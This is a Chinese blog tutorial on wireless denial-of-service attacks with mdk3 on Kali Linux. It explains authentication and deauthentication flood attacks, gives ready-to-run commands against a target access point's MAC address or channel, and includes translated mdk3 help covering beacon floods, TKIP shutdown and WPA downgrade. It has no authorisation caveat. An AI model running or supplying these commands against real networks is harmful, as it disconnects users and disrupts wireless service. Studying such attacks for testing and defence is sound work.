mdk3 ----无线D.O.S攻击(拒绝服务攻击)
来源:互联网 发布:齐鲁交易软件下载 编辑:程序博客网 时间:2024/05/17 07:37
环境:kali linux 2017
工具:MDK3 aircrack-ng套件
1.关于无线连接验证有两种
1)开放式密钥验证 2)预共享密钥验证
2.关于无线客户端状态
1)没有通过验证,没有和AP建立关联 无线客户端处于搜索及试图连接AP阶段2)通过验证,没有和AP建立关联 无线客户端已经输入正确的连接密码并等待3)通过验证,和AP建立关联 无线客户端被允许链接(AP自动分配地址)
3.Auth Flood攻击
Authentication Flood Attack(身份验证洪水攻击) 攻击原理: 1)客户端与AP建立连接 2)发送伪造的客户端验证请求 3)大量请求导致AP失去能力 4)已连接的客户端被强制断开
攻击实现:
ps:排除干扰: airmon-ng check killa.启用无线网卡Monitor(监听模式): airmon-ng start 网卡名 Example:airmon-ng start waln1 #ifconfig查看无线网卡名称b.抓取当前无线网络状况: airodump-ng 网卡名 -c(可选项) 信道 Example:airodump-ng wlan1mon -c 6 #当前指定只抓取信道为6的APc.攻击: mdk3 网卡名 a -a AP的mac地址 Example:mdk3 wlan0mon a -a 00:1F:DD:60:C2:90
4.Deauth Flood攻击
Deauthentication Flood Attack(取消身份验证攻击)攻击原理:1)客户端与AP建立连接 2)通过广播插入伪造的取消身份认证报文 3)客户端认为该报文来自AP 4)已连接的客户端自行断开
攻击实现:
a.启用无线网卡Monitorb.抓取当前无线网络状况c.攻击:mdk3 网卡名 d -c 信道 example: mdk3 wlan0mon d -c 6
5.Association Flood攻击
Association Flood Attack(关联洪水攻击)攻击原理:1)客户端与AP建立连接 2)创建大量伪造的客户端关联 3)大量请求导致AP失去能力 4)已连接的客户端被强制断开
此类攻击的表现和Authentication Flood Attack很相似但是原理却有本质的不同
攻击实现:可参照Authentication Flood Attack攻击参数
6.Disassociation Flood攻击
Disassociation Flood Attack(取消关联洪水攻击)
攻击原理:Disassociation Flood Attack的攻击方式和Deauthentication Flood Attack(取消身份验证攻击)很相似但是发送的数据包的有本质不同
攻击实现:参照Deauthentication Flood Attack
PS:MDK3常用参数介绍
MDK USAGE:mdk3 <interface> <test_mode> [test_options] #mdk3用法:mdk3 网卡 测试模式 测试选项TEST MODES: #测试模式b - Beacon Flood Mode #信标洪水模式 其实就是制造虚假AP干扰正常AP OPTIONS: -n <ssid> Use SSID <ssid> instead of randomly generated ones #使用SSID <ssid>而不是随机生成的 -f <filename> Read SSIDs from file #从文件中读取SSID -v <filename> Read MACs and SSIDs from file. #从文件读取MAC和SSID -d Show station as Ad-Hoc #将站显示为Ad-Hoc -w Set WEP bit (Generates encrypted networks) #设置WEP位(生成加密网络) -g Show station as 54 Mbit # 显示工作站为54M -t Show station using WPA TKIP encryption #使用WPA TKIP加密显示工作站 -a Show station using WPA AES encryption #使用WPA AES加密显示工作站 -m Use valid accesspoint MAC from OUI database #使用来自OUI数据库的有效访问点MAC -h Hop to channel where AP is spoofed #跳到AP被欺骗的频道 This makes the test more effective against some devices/drivers #这使得测试对于某些设备/驱动程序更有效 But it reduces packet rate due to channel hopping. #但它减少了由于信道跳频的分组速率 -c <chan> Fake an AP on channel <chan>. If you want your card to hop on #在频道<chan>上创建AP。如果你想要你的卡上跳 this channel, you have to set -h option, too! #这个通道,你必须设置-h选项! -s <pps> Set speed in packets per second (Default: 50) #设置速度(以秒为单位)(默认值:50)a - Authentication DoS mode # 身份验证洪水攻击 OPTIONS: -a <ap_mac> Only test the specified AP #只测试指定的AP -m Use valid client MAC from OUI database #从OUI数据库使用有效的客户端MAC -c Do NOT check for test being successful #不要检查测试是否成功 -i <ap_mac> Perform intelligent test on AP (-a and -c will be ignored) #在AP上执行智能测试(-a和-c将被忽略) This test connects clients to the AP and reinjects sniffed data to keep them alive #此测试将客户端连接到AP,并重新注入嗅探的数据以保持活动 -s <pps> Set speed in packets per second (Default: unlimited) #设置速度(以每秒包数为单位)(默认值:无限制)p - Basic probing and ESSID Bruteforce mode #基本探测和ESSID Bruteforce模式 Use -f and -t option to enable SSID Bruteforcing. #使用-f和-t选项来启用SSID Bruteforcing。 OPTIONS: -e <ssid> Tell mdk3 which SSID to probe for # 告诉mdk3要探测的SSID -f <filename> Read lines from file for bruteforcing hidden SSIDs #从文件中读取行以强制执行隐藏的SSID -t <bssid> Set MAC adress of target AP #设置目标AP的MAC地址 -s <pps> Set speed (Default: unlimited, in Bruteforce mode: 300) # 设置速度(默认值:无限制,在Bruteforce模式下:300) -b <character set> Use full Bruteforce mode (recommended for short SSIDs only!) #使用完全的Bruteforce模式(建议只使用短SSID!) Use this switch only to show its help screen. #使用此开关仅显示其帮助屏幕 d - Deauthentication / Disassociation Amok Mode #Deauthentication / Disassociation攻击模式 Kicks everybody found from AP #踢掉每个客户端 OPTIONS: -w <filename> Read file containing MACs not to care about (Whitelist mode) #白名单模式 读取包含MAC的文件以运行测试 -b <filename> Read file containing MACs to run test on (Blacklist Mode) #黑名单模式 读取文件中的运行测试MAC运行测试 -s <pps> Set speed in packets per second (Default: unlimited) #设置速度(以每秒包数为单位)(默认值:无限制) -c [chan,chan,chan,...] Enable channel hopping. Without providing any channels, mdk3 will hop an all #设置信道跳跃如果没指定,mdk3会跳一个 14 b/g channels. Channel will be changed every 5 seconds. #14 b / g通道。信道每5秒更改一次m - Michael shutdown exploitation (TKIP) #MAC关闭利用 Cancels all traffic continuously #连续取消所有流量 -t <bssid> Set Mac address of target AP #设置目标AP的Mac地址 -w <seconds> Seconds between bursts (Default: 10) #突发之间的秒数(默认值:10) -n <ppb> Set packets per burst (Default: 70) #设置每个数据包的数据包(默认值:70) -j Use the new TKIP QoS-Exploit #使用新的TKIP QoS-Exploit Needs just a few packets to shut AP down! #需要几个数据包才能关闭AP! -s <pps> Set speed (Default: 400) #设置速度(默认值:400)w - WIDS/WIPS/WDS Confusion 将WDS与多认证客户端混淆,从而弄乱路由表 -e <SSID> SSID of target WDS network #目标WDS网络的SSID -c [chan,chan,chan...] Use channel hopping #使用信道跳跃 -z 激活Zero_Chaos的WIDS攻击 (验证客户端从WDS到外部AP,使WIDS变得坚果)f - MAC filter bruteforce mode #MAC过滤器强制模式 此测试使用已知客户端MAC地址的列表,并尝试 在动态改变的同时向给定AP认证它们 其响应超时以获得最佳性能。它目前只工作 对正确拒绝开放身份验证请求的AP -t <bssid> Target BSSID #目标BSSID -m <mac> Set the MAC adress range to use (3 bytes, i.e. 00:12:34) #设置要使用的MAC地址范围(3字节,即00:12:34) Without -m, the internal database will be used #如果没有-m,将使用内部数据库 -f <mac> Set the MAC adress to begin bruteforcing with #设置MAC地址以开始强制 (Note: You can't use -f and -m at the same time) #(注意:不能同时使用-f和-m)g - WPA Downgrade test #WPA降级测试 deauthenticates发送WPA加密数据包的站和AP。 有了这个测试,你可以检查sysadmin是否会尝试设置他的 网络到WEP或禁用加密。 mdk3将使WEP和未加密 客户端工作,所以如果系统管理员只是认为“WPA是破碎”他 肯定不是这个工作的正确。 (这可以/应该与社会工程相结合) -t <bssid> Target network #目标网络
阅读全文
0 0
- mdk3 ----无线D.O.S攻击(拒绝服务攻击)
- udp 500 D.O.S攻击
- 赛门铁客防火墙D.o.s攻击代码
- 赛门铁客防火墙D.o.s攻击代码
- udp 500 D.O.S攻击
- udp 500 D.O.S攻击
- udp 500 D.O.S攻击
- 拒绝服务攻击
- 拒绝服务攻击
- 拒绝服务攻击
- 拒绝服务攻击
- 分布式拒绝服务攻击 DDoS攻击
- 拒绝服务攻击(DOS)
- DoS拒绝服务攻击
- 实验11 拒绝服务攻击
- DDOS拒绝服务攻击原理
- 拒绝服务攻击(dos)
- C++拒绝服务攻击DOS
- Ubuntu14.04环境下配置TFTP服务器
- PHP实现插入排序
- network in network论文
- C#学习笔记(八)—–LINQ查询的基础知识(上)
- Python打造漏洞扫描器 5
- mdk3 ----无线D.O.S攻击(拒绝服务攻击)
- Android中的GraphicBuffer同步机制-Fence
- SPI、I2C、UART、I2S、GPIO、SDIO、CAN,你能分清楚吗?
- window.location.href和window.open的几种用法和区别
- Java 用位运算改写加法、乘法
- 第一天写博客心情
- Python打造漏洞扫描器 6
- java NIO理解
- wget 递归下载整个网站